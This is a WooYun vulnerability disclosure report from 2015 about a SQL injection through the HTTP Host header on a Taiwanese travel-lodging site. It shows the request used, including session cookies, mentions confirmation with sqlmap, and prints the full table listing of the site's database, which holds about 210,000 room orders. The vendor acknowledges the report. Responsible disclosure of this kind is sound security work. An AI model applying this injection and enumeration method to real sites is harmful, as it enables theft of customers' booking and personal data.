当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160756

漏洞标题:Via`s旅行札記某站存在Host字段SQL注入(21萬房間訂單信息洩露)(臺灣地區)

相关厂商:Via`s旅行札記

漏洞作者: Xmyth_夏洛克

提交时间:2015-12-13 13:22

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-13: 细节已通知厂商并且等待厂商处理中
2015-12-15: 厂商已经确认,细节仅向厂商公开
2015-12-25: 细节向核心白帽子及相关领域专家公开
2016-01-04: 细节向普通白帽子公开
2016-01-14: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

RT

详细说明:

存在注入URL:**.**.**.**

站点.png


其中host字段過濾不嚴導致SQL注入,單引號嘗試導致報錯

报错.png


GET / HTTP/1.1
Host: **.**.**.***
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=vm20qfgod5rip11vqov3aa1hf2; _ga=GA1.2.584452688.1449899997; __auc=6d2d15a715194c6a3ffdf53d737; __asc=bbd94a3d151950132912ef7677c; __utma=138364462.1515349163.1449903864.1449903864.1449903864.1; __utmb=138364462; __utmc=138364462; __utmz=138364462.1449903864.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Connection: keep-alive


放入sqlmap跑,證明存在注入

注入点.png

漏洞证明:

涉及數據庫

dbs.png


大量敏感信息洩露,房間訂單達到21萬
Database: gogoblog
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| w_order2_confirm | 736451 |
| calendar | 390254 |
| w_counterrecord | 331236 |
| w_room_order2 | 214747 |
| w_guestbook | 56649 |
| w_club_todaycount | 49001 |
| w_sign_confirm | 13291 |
| w_room_order | 11696 |
| blog_myfriendlog | 9221 |
| syslog201412 | 5473 |
| syslog201409 | 5214 |
| syslog201501 | 5173 |
| syslog201503 | 5162 |
| syslog201410 | 5155 |
| syslog201408 | 5107 |
| syslog201407 | 5094 |
| syslog201505 | 5046 |
| syslog201504 | 5004 |
| syslog201411 | 4919 |
| syslog201507 | 4757 |
| syslog201502 | 4732 |
| gallery_images | 4649 |
| w_room_comment | 4587 |
| syslog201506 | 4579 |
| syslog201510 | 4463 |
| syslog201508 | 4394 |
| w_clean_list | 4343 |
| syslog201406 | 4253 |
| syslog201509 | 4185 |
| syslog201403 | 4183 |
| syslog201405 | 4139 |
| syslog201511 | 4139 |
| syslog201404 | 4070 |
| syslog201210 | 4055 |
| w_guestbook_itravel | 4008 |
| syslog201401 | 3895 |
| syslog201308 | 3838 |
| syslog201307 | 3833 |
| syslog201312 | 3794 |
| syslog201402 | 3779 |
| syslog201209 | 3737 |
| w_pay | 3598 |
| syslog201206 | 3571 |
| syslog201310 | 3557 |
| syslog201309 | 3539 |
| syslog201311 | 3520 |
| syslog201212 | 3488 |
| syslog201207 | 3464 |
| syslog201208 | 3395 |
| syslog201211 | 3381 |
| syslog201304 | 3366 |
| syslog201306 | 3362 |
| syslog201305 | 3296 |
| syslog201303 | 3279 |
| syslog201108 | 3255 |
| syslog201202 | 3245 |
| syslog201201 | 3138 |
| syslog201301 | 3116 |
| w_guestbook_m | 3052 |
| syslog201302 | 3045 |
| syslog201107 | 3032 |
| syslog201112 | 2976 |
| syslog201111 | 2772 |
| syslog201110 | 2615 |
| syslog201203 | 2584 |
| syslog201204 | 2582 |
| syslog201109 | 2578 |
| syslog201205 | 2561 |
| w_blog_board | 2310 |
| m_list | 2304 |
| syslog201104 | 2148 |
| syslog201106 | 1884 |
| syslog201103 | 1819 |
| syslog201512 | 1777 |
| syslog201101 | 1772 |
| syslog201105 | 1742 |
| syslog201102 | 1538 |
| syslog201001 | 1533 |
| syslog201012 | 1421 |
| syslog201008 | 1402 |
| syslog201011 | 1361 |
| syslog201009 | 1273 |
| syslog201010 | 1239 |
| syslog201007 | 1234 |
| syslog200912 | 1223 |
| w_push_blog | 1203 |
| syslog201006 | 1181 |
| syslog201003 | 1156 |
| syslog201005 | 1134 |
| w_product_attrib | 1085 |
| syslog201004 | 1058 |
| syslog201002 | 1053 |
| syslog200910 | 1046 |
| syslog200911 | 1024 |
| w_blog_mailto | 886 |
| w_bloglist | 864 |
| w_push_room | 803 |
| room_class | 746 |
| syslog200908 | 724 |
| syslog200909 | 704 |
| news | 674 |
| photo_class | 477 |
| w_blog_extend | 442 |
| w_travel_point | 410 |
| syslog200907 | 381 |
| postal_zone | 337 |
| w_push_news | 294 |
| w_member | 292 |
| w_ordertitles | 263 |
| w_product | 257 |
| w_blogcategory | 162 |
| w_travelmap | 154 |
| w_ordermain | 146 |
| w_work_list | 127 |
| w_product_board | 123 |
| w_room_blacklist | 116 |
| w_contact | 95 |
| w_link | 83 |
| news_bar | 69 |
| room_class_type | 61 |
| w_category | 60 |
| w_travel_club | 53 |
| B2_pro | 52 |
| w_travel_club_itravel | 51 |
| w_clean_price2015 | 48 |
| w_web_config | 48 |
| w_clean_price | 47 |
| w_travel_content | 45 |
| L2 | 44 |
| w_travel_content_mobile | 43 |
| w_blog_bulletin | 41 |
| club_shop_explain | 36 |
| w_adver | 35 |
| w_room_price | 35 |
| w_travel_club2 | 35 |
| w_shop_pay | 32 |
| w_system | 32 |
| w_class | 30 |
| w_shop_explain | 30 |
| w_system_v1 | 30 |
| w_system_v2 | 30 |
| bulletin | 29 |
| w_travel_club_holiday | 29 |
| w_pointcategory | 28 |
| w_shop_pay_mobile | 28 |
| w_travelmap_extend | 27 |
| website_config | 27 |
| w_shop_explain_mobile | 26 |
| w_job | 24 |
| w_hotel_explain | 23 |
| C2 | 22 |
| shopping_item | 22 |
| w_system_v3 | 20 |
| w_upload_image | 20 |
| w_bookmark_city | 19 |
| w_order_mailto | 19 |
| w_blog_myfriend | 18 |
| L1 | 17 |
| L1_pro | 17 |
| L2_pro | 17 |
| C1 | 16 |
| w_payment | 15 |
| w_system_85inn | 14 |
| w_favorite | 12 |
| B1_pro | 11 |
| w_top_product | 11 |
| w_qa_list | 10 |
| w_web_service | 10 |
| w_forum_board_re | 9 |
| question_n1 | 8 |
| w_forum_board | 8 |
| w_service_list | 8 |
| room_weed | 7 |
| w_company | 7 |
| w_travel_club_m | 7 |
| room_states_i | 6 |
| room_states_i2 | 6 |
| w_agreement | 6 |
| w_edu | 6 |
| w_income | 6 |
| w_order_agreement | 6 |
| w_shop_freightage | 6 |
| room_states | 5 |
| w_blogcategory2 | 5 |
| w_product_explain | 5 |
| w_qa | 5 |
| w_auth | 4 |
| w_bookmark | 4 |
| w_carrer | 4 |
| w_shop_privacy | 4 |
| w_shop_return | 4 |
| w_theme | 4 |
| food_class | 3 |
| w_multi_map | 3 |
| w_paynow_payment | 3 |
| question_vote_record | 2 |
| w_active | 2 |
| w_bookmark_board | 2 |
| w_guestbook2_m | 2 |
| w_order_mail_content | 2 |
| w_travel_board | 2 |
| w_travel_club_85love | 2 |
| weblog201501 | 2 |
| club_shop_explain2 | 1 |
| question | 1 |
| w_adver_m | 1 |
| w_auth_passwd | 1 |
| w_food_explain | 1 |
| w_hotel_explain2 | 1 |
| w_pcount | 1 |
| w_users | 1 |
| w_vote | 1 |
| weblog201201 | 1 |
+-------------------------+---------+

数据.png

修复方案:

過濾參數

版权声明:转载请注明来源 Xmyth_夏洛克@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-12-15 03:38

厂商回复:

感謝通報

最新状态:

暂无